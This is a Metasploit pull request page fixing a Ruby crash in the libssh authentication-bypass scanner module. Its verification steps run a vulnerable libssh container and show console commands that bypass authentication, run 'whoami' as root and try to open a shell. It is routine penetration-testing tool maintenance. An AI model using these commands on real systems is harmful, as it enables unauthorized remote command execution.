Fix libssh_auth_bypass crash on newer versions of Ruby #18203

adfoster-r7

Closes #18167

Verification

Run the vulnerable ssh target:

docker run -it -p 3333:22 vulhub/libssh:0.8.1

Verify Execute action with a cmd module works:

msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Execute CMD=whoami
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[*] 127.0.0.1:3333 - Executed: whoami
root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Verify a new session is created. Note that shell verification/interaction fails for me, but it looks like an existing problem from when the functionality was first merged in?

msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Shell
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[-] Command shell session 3 is not valid and will be closed
[*] 127.0.0.1 - Command shell session 3 closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@adfoster-r7 adfoster-r7 changed the title Fix libssh_auth_bypass crash on newer versions Fix libssh_auth_bypass crash on newer versions of Ruby Jul 20, 2023
@adfoster-r7 adfoster-r7 force-pushed the fix-libssh-auth-bypass-crash-on-new-ruby-versions branch from bdce48e to fa97281 Compare July 25, 2023 12:48
@cgranleese-r7 cgranleese-r7 added the rn-fix release notes fix label Aug 3, 2023
@cgranleese-r7 cgranleese-r7 merged commit 49c5b1d into rapid7:master Aug 3, 2023
34 checks passed
@cgranleese-r7 cgranleese-r7 self-assigned this Aug 3, 2023
@cgranleese-r7

Release Notes

Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby

Labels
bug rn-fix release notes fix
Successfully merging this pull request may close these issues.

auxiliary/scanner/ssh/libssh_auth_bypass ArgumentError wrong number of arguments